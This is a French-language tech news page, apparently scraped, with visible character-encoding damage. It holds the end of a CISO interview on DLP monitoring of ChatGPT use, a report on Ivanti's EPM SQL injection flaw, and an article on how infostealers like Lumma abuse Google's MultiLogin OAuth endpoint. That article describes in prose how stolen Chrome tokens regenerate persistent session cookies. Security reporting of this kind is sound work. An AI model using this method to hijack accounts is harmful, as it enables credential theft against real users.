Cyberhaven, sans aucun doute. J’ai utilisĂ© des technologies DLP traditionnelles par le passĂ© et le rapport bruit/signal peut parfois ĂŞtre très Ă©levĂ©. Ce que Cyberhaven nous permet de faire, c’est de mettre beaucoup de contexte autour de la surveillance des mouvements de donnĂ©es dans toute l’entreprise – tout ce qui quitte un point d’extrĂ©mitĂ©. Cela inclut les points d’accès au SaaS, les points d’accès au stockage, autant de contextes. Cela a considĂ©rablement amĂ©liorĂ© notre protection et notre surveillance des mouvements de donnĂ©es et des risques liĂ©s aux initiĂ©s. Cette technologie nous a Ă©normĂ©ment aidĂ©s dans le contexte OpenAI.
En ce qui concerne Cyberhaven, un rapport rĂ©cent a montrĂ© qu’environ un employĂ© sur 20 colle des donnĂ©es confidentielles de l’entreprise dans le seul chatGPT, sans parler des autres outils d’IA internes. Lorsque vous avez surpris des employĂ©s en train de le faire, quels types de donnĂ©es Ă©taient typiquement copiĂ©es et collĂ©es qui seraient considĂ©rĂ©es comme sensibles ?
Pour ĂŞtre honnĂŞte, dans le contexte OpenAI, je n’ai rien identifiĂ© de significatif. Quand je dis important, je fais rĂ©fĂ©rence Ă  des informations personnelles identifiables sur les clients ou sur les produits. Bien sĂ»r, il y a eu plusieurs autres cas de risques d’initiĂ©s pour lesquels nous avons dĂ» procĂ©der Ă  un triage et faire intervenir le service juridique pour mener toutes les enquĂŞtes. En ce qui concerne OpenAI en particulier, j’ai vu ici et lĂ  des cas oĂą nous avons bloquĂ© l’accès en fonction du contexte, mais je ne me souviens pas d’une fuite massive de donnĂ©es.
Pensez-vous que les outils d’IA gĂ©nĂ©rique Ă  usage gĂ©nĂ©ral finiront par ĂŞtre supplantĂ©s par des outils internes plus petits, spĂ©cifiques Ă  un domaine, qui peuvent ĂŞtre mieux utilisĂ©s pour des usages spĂ©cifiques et plus facilement sĂ©curisĂ©s ?
Il y a beaucoup de cela en ce moment – des modèles plus petits. Si vous regardez comment OpenAI positionne sa technologie, l’entreprise veut ĂŞtre une plateforme sur laquelle ces modèles plus petits ou plus grands peuvent ĂŞtre construits. J’ai donc l’impression qu’un grand nombre de ces petits modèles seront créés en raison des ressources informatiques que les grands modèles consomment. Le calcul deviendra un dĂ©fi, mais je ne pense pas qu’OpenAI sera dĂ©passĂ©. Il s’agit d’une plateforme qui vous offre une certaine flexibilitĂ© quant Ă  la manière dont vous souhaitez dĂ©velopper et Ă  la taille de la plateforme que vous souhaitez utiliser. C’est ainsi que je vois les choses se poursuivre.
Pourquoi les entreprises devraient-elles croire qu’OpenAI ou d’autres fournisseurs SaaS d’IA n’utiliseront pas les donnĂ©es Ă  des fins inconnues, telles que l’entraĂ®nement de leurs propres grands modèles de langage ?
Nous avons un accord d’entreprise avec eux, et nous avons choisi de nous en retirer. Nous avons pris de l’avance d’un point de vue juridique. C’est la norme pour tout fournisseur de services cloud.
Quelles mesures conseilleriez-vous Ă  d’autres RSSI de prendre pour sĂ©curiser leurs entreprises contre les risques potentiels posĂ©s par la technologie IA gĂ©nĂ©rative ?
Commencez par l’approche des personnes, des processus et des technologies. Effectuer une Ă©valuation de l’analyse des risques du point de vue des personnes, des processus et de la technologie. Faites une Ă©valuation globale et holistique des risques. Ce que je veux dire par lĂ , c’est qu’il faut examiner votre adoption globale : allez-vous l’utiliser dans les workflows de vos produits ? Si c’est le cas, il faut que le directeur technique et l’Ă©quipe d’ingĂ©nieurs soient des acteurs clĂ©s de cette Ă©valuation des risques. Il faut bien sĂ»r que le service juridique soit impliquĂ©. Vous devez impliquer vos homologues chargĂ©s de la sĂ©curitĂ© et de la protection de la vie privĂ©e. Il existe Ă©galement plusieurs cadres dĂ©jĂ  proposĂ©s pour effectuer ces Ă©valuations des risques. Le NIST a publiĂ© un cadre d’Ă©valuation des risques liĂ©s Ă  l’adoption d’un tel système, qui aborde pratiquement tous les risques Ă  prendre en compte. Vous pouvez ensuite dĂ©terminer celui qui s’applique Ă  votre environnement. Il faut ensuite mettre en place un processus de surveillance continue de ces contrĂ´les, afin de couvrir le tout de bout en bout.

Sécurité informatique

Ivanti corrige une faille critique dans son EPM

La solution de gestion des terminaux bout de rĂ©seau d’Ivanti est touchĂ©e par une vulnĂ©rabilitĂ© critique. Si aucun exploit n’a encore Ă©tĂ© dĂ©tectĂ©, l’application d’un correctif doit ĂŞtre effectuĂ©e dès que possible.
Attention Ă  une vulnĂ©rabilitĂ© dĂ©couverte dans l’outil de surveillance de terminaux Endpoint Manager (EPM) d’Ivanti pour entreprises. Aujourd’hui corrigĂ©e, elle peut dĂ©boucher en cas d’exploit sur le piratage de terminaux endpoint gĂ©rĂ©s par cette solution. Le fournisseur conseille ainsi aux utilisateurs de dĂ©ployer le correctif dès que possible, car les failles dans ce type d’outils sont des cibles attrayantes que les attaquants ont dĂ©jĂ  exploitĂ© dans le passĂ©. Cette faille, rĂ©fĂ©rencĂ©e CVE-2023-39336, affecte la version EPM 2022 SU4 et toutes les versions antĂ©rieures de la solution d’Ivanti, et affiche un score de criticitĂ© de 9,6 sur 10. Dans son bulletin, le fournisseur explique que cette faille d’injection SQL permet Ă  des attaquants situĂ©s sur le mĂŞme rĂ©seau d’exĂ©cuter des requĂŞtes SQL arbitraires et de rĂ©cupĂ©rer les rĂ©sultats sans avoir besoin d’une authentification du serveur EPM. Une exploitation rĂ©ussie peut conduire les attaquants Ă  prendre le contrĂ´le des machines exĂ©cutant l’agent EPM ou Ă  exĂ©cuter un code arbitraire sur le serveur si ce dernier est configurĂ© avec Microsoft SQL Express. Sinon, l’impact s’applique Ă  toutes les instances de MSSQL.
Le 20 dĂ©cembre, le fournisseur avait corrigĂ© 20 vulnĂ©rabilitĂ©s dans sa solution de gestion des terminaux mobiles d’entreprise (Enterprise Mobile Device Management, EDM) Avalanche. MĂŞme si pour le moment aucun rapport n’indique que ces failles ont Ă©tĂ© ciblĂ©es dans la nature, d’autres zero day dans les produits de gestion de terminaux d’Ivanti ont dĂ©jĂ  Ă©tĂ© exploitĂ©es par le passĂ©. En aoĂ»t, l’Ă©diteur avait mis en garde ses clients contre une faille de contournement d’authentification dans son produit Sentry, anciennement connu sous le nom de MobileIron Sentry, une passerelle qui sĂ©curise le trafic entre les terminaux mobiles et les systèmes d’entreprise backend. L’agence amĂ©ricaine de cybersĂ©curitĂ© et de sĂ©curitĂ© des infrastructures (cybersecurity and infrastructure security agency, CISA) avait alors ajouté ce trou de sĂ©curité à son catalogue de vulnĂ©rabilitĂ©s connues et exploitĂ©es « Known Exploited Vulnerabilities ».
Une faille dans EDM déjà corrigée en décembre 2023
En juillet 2023 des attaquants bĂ©nĂ©ficiant d’un soutien de niveau Ă©tatique, avaient exploitĂ© deux vulnĂ©rabilitĂ©s zero day, rĂ©fĂ©rencĂ©es CVE-2023-35078 et CVE-2023-35081, dans la solution Endpoint Manager Mobile (EPMM) du mĂŞme Ă©diteur, anciennement connu sous le nom de MobileIron Core, pour s’introduire dans les rĂ©seaux du gouvernement norvĂ©gien. Par le passĂ©, de nombreux acteurs malveillants spĂ©cialisĂ©s dans les attaques de ransomware ont exploitĂ© des failles dans des logiciels de gestion des terminaux, y compris des logiciels utilisĂ©s par des fournisseurs de services managĂ©s (Managed Services Providers, MSP), ce qui a pu avoir un impact sur des milliers d’entreprises. En raison de leurs capacitĂ©s Ă©tendues et de leurs autorisations Ă  privilèges sur les systèmes, ces agents de gestion peuvent ĂŞtre utilisĂ©s comme des chevaux de Troie d’accès distant s’ils sont dĂ©tournĂ©s.

Sécurité informatique

Les cybercriminels se ruent sur un exploit via Multilogin OAuth de Google

Une faille dans la fonction Multilogin OAuthe de Google est capable de générer des cookies persistant offrant un accès continu aux services de la société. La réinitialisation du mot de passe se révèle inefficace, une aubaine pour les malwares volant des identifiants.
Un exploit apparu en octobre 2023 donne des sueurs froides aux équipes de sécurité, mais fait la joie des cybercriminels. En effet, un endpoint OAuth (protocole autorisant l’accès à une application tierce sans transmettre son mot de passe) non documenté de Google est à l’origine de cet exploit. Ce dernier est capable de généré des cookies d’authentification Google persistants en manipulant des tokens et offrant ainsi un accès continu aux service de la firme même après la réinitialisation du mot de passe. Ce procédé a été révélé la première fois par un pirate, dénommé « Prisma », sur un canal Telegram.
Selon un article du blog de CloudSEK, un spĂ©cialiste de la cybersĂ©curitĂ©, la racine de l’exploit se situe au niveau d’un point de terminaison OAuth de Google non documentĂ© appelĂ© « MultiLogin ». En l’utilisant, les attaquants sont capables de renouveler les cookies d’authentification expirĂ©s et obtenir un accès non autorisĂ© aux services Google actifs d’un utilisateur. Les experts ont dĂ©couvert ce modus operandi en dĂ©cortiquant le malware Lumma, un programme volant des identifiants (ou infostealer). Ils ont constatĂ© que l’exploit Ă©tait aussi prĂ©sent chez d’autres infostealer : par Rhadamanthys, Risepro, Meduza et Stealc Stealer, et White Snake
La découverte d’un endpoint Multilogin OAuth non documenté
En analysant la base de code de Chromium, CloudSEK a identifiĂ© le point de terminaison MultiLogin utilisĂ© comme mĂ©canisme interne qui sert Ă  synchroniser les comptes Google Ă  travers les services. « Ce point d’accès fonctionne en acceptant un vecteur d’identifiants de compte et de jetons d’authentification, des donnĂ©es essentielles pour gĂ©rer des sessions simultanĂ©es ou passer d’un profil d’utilisateur Ă  un autre de manière transparente », a expliquĂ© la sociĂ©tĂ©. « Si la fonction MultiLogin joue un rĂ´le essentiel dans l’authentification des utilisateurs, elle constitue Ă©galement un moyen d’exploitation si elle est mal gĂ©rĂ©e, comme en tĂ©moignent les rĂ©cents dĂ©veloppements de malware », ajoute-t-elle.
Pour confirmer qu’un serveur MultiLogin a Ă©tĂ© utilisĂ© pour rĂ©gĂ©nĂ©rer les cookies de session dans l’exploit, CloudSEK a, après une discussion avec Prisma, effectuĂ© une rĂ©tro-ingĂ©nierie de l’exĂ©cutable de l’exploit fourni par le cybercriminel. L’analyse a rĂ©vĂ©lĂ© le point de terminaison MultiLogin spĂ©cifique et non documentĂ© utilisĂ© dans l’exploit.
La réinitialisation des mots de passe insuffisante
L’exploit n’est possible qu’après un premier piratage du système de l’utilisateur pour rĂ©cupĂ©rer des jetons de session valides. Un malware infecte d’abord l’ordinateur d’une victime, souvent Ă  partir de spams ou de tĂ©lĂ©chargements non fiables. Une fois le système compromis, le malware recherche les cookies de session du navigateur web et d’autres donnĂ©es exploitables pour obtenir un accès non autorisĂ© Ă  des comptes. Les tokens de session volĂ©s sont envoyĂ©s aux attaquuants, ce qui leur permet d’infiltrer les comptes compromis et d’en prendre le contrĂ´le.
Et mĂŞme si les utilisateurs dĂ©tectent la faille et modifient leur mot de passe Google, les jetons volĂ©s peuvent toujours ĂŞtre utilisĂ©s pour se connecter. Le malware extrait et dĂ©crypte les identifiants de compte et les jetons d’authentification des comptes Google actifs en examinant le tableau token_service dans les donnĂ©es Web de Chrome, qu’il utilise avec MultiLogin pour rĂ©gĂ©nĂ©rer en permanence les informations de session. Pour attĂ©nuer ce risque, il est conseillĂ© aux utilisateurs de se dĂ©connecter complètement, ce qui rendra les jetons de session invalides et empĂŞchera toute exploitation ultĂ©rieure.
L’exploit de Lumma, dissimulé par un chiffrement du jeton
Afin de cacher son mĂ©canisme d’exploitation, Lumma a chiffrĂ© le jeton d’accès extrait de la table token_service : GAIA ID, un composant essentiel du processus d’authentification de Google. « Quand cette paire est utilisĂ©e en conjonction avec le endpoint MultiLogin, elle permet la rĂ©gĂ©nĂ©ration des cookies de service de Google », a dĂ©clarĂ© CloudSEK. « L’innovation stratĂ©gique de Lumma rĂ©side dans le chiffrement de cette paire token:GAIA ID avec ses propres clĂ©s privĂ©es. Le chiffrement a Ă©tĂ© utilisĂ© comme un mĂ©canisme de « boĂ®te noire » qui a permis Ă  Lumma de masquer efficacement son mĂ©canisme principal Ă  d’autres entitĂ©s malveillantes pour les empĂŞcher de le reproduire ».
Cependant, pour contrer la restriction de Google sur la rĂ©gĂ©nĂ©ration des cookies basĂ©e sur l’adresse IP, Lumma a utilisĂ© des proxies SOCKS Ă  partir de novembre 2023. Or ceux-ci ont rĂ©vĂ©lĂ© certains dĂ©tails sur les demandes et les rĂ©ponses, ce qui a compromis la dissimulation.